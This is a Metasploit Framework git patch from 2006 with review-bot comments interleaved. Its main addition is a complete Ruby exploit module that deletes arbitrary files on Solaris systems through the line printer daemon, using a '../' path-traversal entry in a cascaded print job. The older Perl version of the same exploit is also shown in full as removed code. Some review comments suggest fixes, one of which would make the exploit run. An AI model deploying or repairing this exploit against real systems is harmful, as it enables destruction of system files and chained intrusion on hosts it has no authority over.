From 9fc93bbe566d9b7883a51d81f42b40682dc49cbf Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 2 Jan 2006 01:12:36 +0000 Subject: [PATCH] Miscellaneous fixes, changes to CMD payloads git-svn-id: file:///home/svn/incoming/trunk@3296 4d416f70-5f16-0410-b530-b9f4589650da --- lib/msf/base/simple/exploit.rb | 5 + lib/msf/core/encoded_payload.rb | 5 + lib/rex/constants.rb | 17 +- .../exploits/solaris/lpd/cascade_delete.rb | 102 +++++++++ .../solaris/lpd/solaris_lpd_unlink.rb | 198 ------------------ modules/exploits/solaris/telnet/ttyprompt.rb | 7 +- .../exploits/windows/http/icecast_header.rb | 4 +- 7 files changed, 120 insertions(+), 218 deletions(-) create mode 100644 modules/exploits/solaris/lpd/cascade_delete.rb delete mode 100644 modules/exploits/solaris/lpd/solaris_lpd_unlink.rb diff --git a/lib/msf/base/simple/exploit.rb b/lib/msf/base/simple/exploit.rb index a4202b8baf..bd3567ef81 100644 --- a/lib/msf/base/simple/exploit.rb +++ b/lib/msf/base/simple/exploit.rb @@ -51,6 +51,11 @@ module Exploit # job. # def self.exploit_simple(exploit, opts) + + p exploit.methods.sort + p exploit.payload? + p exploit.payload_info + # Make sure parameters are valid. if (opts['Payload'] == nil) raise MissingPayloadError, diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index ca332b1f97..24f4239355 100644 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -110,6 +110,8 @@ class EncodedPayload # Get the minimum number of nops to use min = (reqs['MinNops'] || 0).to_i + min = 0 if reqs['DisableNops'] + # Check to see if we have enough room for the minimum requirements if ((reqs['Space']) and @@ -164,6 +166,9 @@ class EncodedPayload self.nop_sled_size = reqs['MaxNops'] end + # Check for the DisableNops setting + self.nop_sled_size = 0 if reqs['DisableNops'] + # Now construct the actual sled if (self.nop_sled_size > 0) pinst.compatible_nops.each { |nopname, nopmod| 
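Review bot: The three `p` calls added at the top of `exploit_simple` read as leftover debugging — `p exploit.methods.sort` dumps every method name of the exploit instance to stdout on each run, and `p exploit.payload?` / `p exploit.payload_info` do the same for payload state, from a library routine rather than a console command. If that information is wanted, route it through the framework's debug logging so it honours the configured log level; otherwise drop the three lines before this lands. The body of `exploit_simple` continues past the end of the hunk.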
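Review bot: `reqs['DisableNops']` is consulted twice in `encoded_payload.rb` but neither site says how the two relate: the `min = 0 if reqs['DisableNops']` in the first hunk only waives the minimum-sled portion of the Space check, while the sled itself is suppressed by `self.nop_sled_size = 0 if reqs['DisableNops']` in the second hunk, after `MaxNops` has already been applied. A comment on the first line such as `# DisableNops also waives the MinNops space requirement; the sled itself is zeroed below` would make that explicit. Because the requirement hash is keyed by free-form strings and the test is bare truthiness, a module that misspells the key silently falls back to the old `MinNops`/`MaxNops` behaviour — I cannot see from this diff whether requirement keys are validated anywhere, so that is worth stating where the option is documented. Both hunks sit inside a method whose start and end lie outside the hunk.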
diff --git a/lib/rex/constants.rb b/lib/rex/constants.rb index 06207ff197..216f52702a 100644 --- a/lib/rex/constants.rb +++ b/lib/rex/constants.rb @@ -68,23 +68,14 @@ ARCH_X86 = 'x86' ARCH_MIPS = 'mips' ARCH_PPC = 'ppc' ARCH_SPARC = 'sparc' +ARCH_CMD = 'cmd' ARCH_TYPES = [ ARCH_X86, ARCH_MIPS, ARCH_PPC, - ARCH_SPARC + ARCH_SPARC, + ARCH_CMD, ] - -ARCH_CMD_UNIX = 'cmd_unix' -ARCH_CMD_LINUX = 'cmd_linux' -ARCH_CMD_BSD = 'cmd_bsd' -ARCH_CMD = - [ - ARCH_CMD_UNIX, - ARCH_CMD_LINUX, - ARCH_CMD_BSD - ] - -ARCH_ALL = ARCH_TYPES + ARCH_CMD +ARCH_ALL = ARCH_TYPES diff --git a/modules/exploits/solaris/lpd/cascade_delete.rb b/modules/exploits/solaris/lpd/cascade_delete.rb new file mode 100644 index 0000000000..324121355f --- /dev/null +++ b/modules/exploits/solaris/lpd/cascade_delete.rb 
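Review bot: `ARCH_ALL = ARCH_TYPES` binds both constants to the same Array object, so any later `ARCH_ALL << x` or `ARCH_TYPES << x` changes both lists, and nothing in the hunk freezes either; `ARCH_ALL = ARCH_TYPES.dup` (or `.freeze` on both) keeps them independent and immutable. Separately, `ARCH_CMD` changes from a three-element Array to the String `'cmd'` and `ARCH_CMD_UNIX`/`ARCH_CMD_LINUX`/`ARCH_CMD_BSD` are removed, so any module or payload elsewhere that still references those names will raise `NameError` at load time; this patch only touches `ttyprompt.rb` and `icecast_header.rb`, which already used `ARCH_CMD`, and I cannot tell from the diff whether other references remain.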
@@ -0,0 +1,102 @@ +require 'msf/core' + +module Msf + +class Exploits::Solaris::Lpd::CascadeDelete < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Solaris LPD Arbitrary File Delete', + 'Description' => %q{ + This module uses a vulnerability in the Solaris line printer + daemon to delete arbitrary files on an affected system. This + can be used to exploit the rpc.walld format string flaw, the + missing krb5.conf authentication bypass, or simply delete + system files. Tested on Solaris 2.6, 7, 8, 9, and 10. + + }, + 'Author' => [ 'hdm', 'Optyx ' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'], + ], + 'Targets' => + [ + ['Automatic Target', { }] + ], + 'DisclosureDate' => '', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(515), + OptString.new('RPATH', [ true, "The remote file path to delete"]), + ], self.class) + end + + def exploit + + # Create a simple control file... + control = "Hmetasploit\nPr00t\n"; + + # The job ID is squashed down to three decimal digits + jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0] + + # Establish the first connection to the server + sock1 = connect(false) + + # Request a cascaded job + sock1.put("\x02metasploit:framework\n") + res = sock1.get_once + if (not res) + print_status("The target did not accept our job request command") + return + end + + # Theoretically, we could delete multiple files at once, however + # the lp daemon will append garbage from memory to the path name + # if we don't stick a null byte after the path. Unfortunately, this + # null byte will prevent the parser from processing the other paths. 
+ control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n" + + dataf = "http://metasploit.com/\n" + + print_status("Deleting #{datstore['RPATH']}...") + if (not ( + send_file(sock1, 2, "cfA" + jid + "metasploit", control) and + send_file(sock1, 3, "dfa" + jid + "metasploit", dataf) + ) ) + sock1.close + return + end + + print_status("Successfully deleted #{datastore['RPATH']} >:-]") + sock1.close + end + + def send_file (s, type, name, data='') + + s.put(type.chr + data.length.to_s + " " + name + "\n") + res = s.get_once(1) + if (not (res and res[0] == 0)) + print_status("The target did not accept our control file command (#{name})") + return + end + + s.put(data) + s.put("\x00") + res = s.get_once(1) + if (not (res and res[0] == 0)) + print_status("The target did not accept our control file data (#{name})") + return + end + + print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length)) + return true + end + +end +end diff --git a/modules/exploits/solaris/lpd/solaris_lpd_unlink.rb b/modules/exploits/solaris/lpd/solaris_lpd_unlink.rb deleted file mode 100644 index 4ffce72106..0000000000 --- a/modules/exploits/solaris/lpd/solaris_lpd_unlink.rb +++ /dev/null 
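Review bot: `print_status("Deleting #{datstore['RPATH']}...")` in `exploit` misspells `datastore`, so the module raises `NameError` on its first run before any file is sent; it should read `print_status("Deleting #{datastore['RPATH']}...")`. A few lines earlier, the early `return` taken when `sock1.get_once` yields no job-request response leaves `sock1` open — the later failure path around the `send_file` calls closes it, but this one does not; add `sock1.close` before that `return`, or wrap the body in `begin`/`ensure` so every exit closes the socket. In `send_file`, `res[0] == 0` depends on `String#[]` returning an Integer, which holds on Ruby 1.8 but not on 1.9 and later, where it returns a one-character String and the comparison is always false; `res.unpack('C').first == 0` behaves the same on both.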
@@ -1,198 +0,0 @@ -require 'msf/core' - -module Msf - -class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote - - include Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Solaris LPD Arbitrary File Delete', - 'Description' => %q{ - This module uses a vulnerability in the Solaris line printer - daemon to delete arbitrary files on an affected system. This - can be used to exploit the rpc.walld format string flaw, the - missing krb5.conf authentication bypass, or simple delete - system files. Tested on Solaris 2.6, 7, 8, 9, and 10. - - }, - 'Author' => [ 'hdm', 'Optyx ' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'], - - ], - 'Privileged' => true, - - 'Targets' => - [ - [ - 'Automatic Targetting', - { - 'Platform' => 'solaris', - 'Ret' => 0x0, - }, - ], - ], - 'DisclosureDate' => '', - 'DefaultTarget' => 0)) - end - - def exploit - connect - - handler - disconnect - end - -=begin - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. 
-## - -package Msf::Exploit::solaris_lpd_unlink; -use base "Msf::Exploit"; -use IO::Socket; -use IO::Select; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'Solaris LPD Arbitrary File Delete', - 'Version' => '$Revision$', - 'Authors' => - [ - 'H D Moore ', - 'Optyx ' - ], - - 'Arch' => [ ], - 'OS' => [ 'solaris' ], - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The LPD server port', 515], - 'RPATH' => [1, 'DATA', 'The remote path name to delete'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module uses a vulnerability in the Solaris line printer daemon - to delete arbitrary files on an affected system. This can be used to exploit - the rpc.walld format string flaw, the missing krb5.conf authentication bypass, - or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10. -}), - - 'Refs' => - [ - ['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'], - ], - - 'DefaultTarget' => 0, - 'Targets' => [['No Target Needed']], - - 'Keys' => ['lpd'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_path = $self->GetVar('RPATH'); - my $res; - - # We use one connection to configure the spool directory - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - # Send a job request that will trigger the cascade adaptor (thanks Dino!) 
- $s->Send("\x02"."metasploit:framework\n"); - $res = $s->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our job request command"); - return; - } - - # The job ID is squashed down to three decimal digits - my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$)); - - # Create a simple control file... - my $control = "Hmetasploit\nPr00t\n"; - - # Theoretically, we could delete multiple files at once, however - # the lp daemon will append garbage from memory to the path name - # if we don't stick a null byte after the path. Unfortunately, this - # null byte will prevent the parser from processing the other paths. - $control .= "U".("../" x 10)."$target_path\x00\n"; - - my $dataf = "http://metasploit.com/\n"; - - $self->PrintLine("[*] Sending the malicious cascaded job request..."); - if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) || - ! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf) || - 0 - ) { $s->Close; return } - - $self->PrintLine(''); - $self->PrintLine("[*] Successfully deleted $target_path >:-]"); - return; -} - -sub SendFile { - my $self = shift; - my $sock = shift; - my $type = shift; - my $name = shift; - my $data = shift; - - $sock->Send(chr($type) .length($data). " $name\n"); - my $res = $sock->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our control file command ($name)"); - return; - } - - $sock->Send($data); - $sock->Send("\x00"); - $res = $sock->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our control file data ($name)"); - return; - } - - $self->PrintLine(sprintf("[*] Uploaded %.4d bytes >> $name", length($data))); - return 1; -} - -1; - -=end - - -end -end diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 963ba8fa6d..31cf8cc356 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb 
@@ -23,14 +23,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote ], 'Privileged' => false, - 'Platform' => 'unix', + 'Platform' => ['unix', 'solaris'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 2000, - 'BadChars' => "", - 'MinNops' => 0, - 'MaxNops' => 0, + 'BadChars' => '', + 'DisableNops' => true, }, 'PayloadCompat' => { diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index d4042819b9..b035ed27c7 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -45,9 +45,7 @@ class Exploits::Windows::Http::Icecast_Header_Overflow < Msf::Exploit::Remote { 'Space' => 2000, 'BadChars' => "\x0d\x0a\x00", - 'MinNops' => 0, - 'MaxNops' => 0, - + 'DisableNops' => true, }, 'Platform' => 'win', 'Targets' =>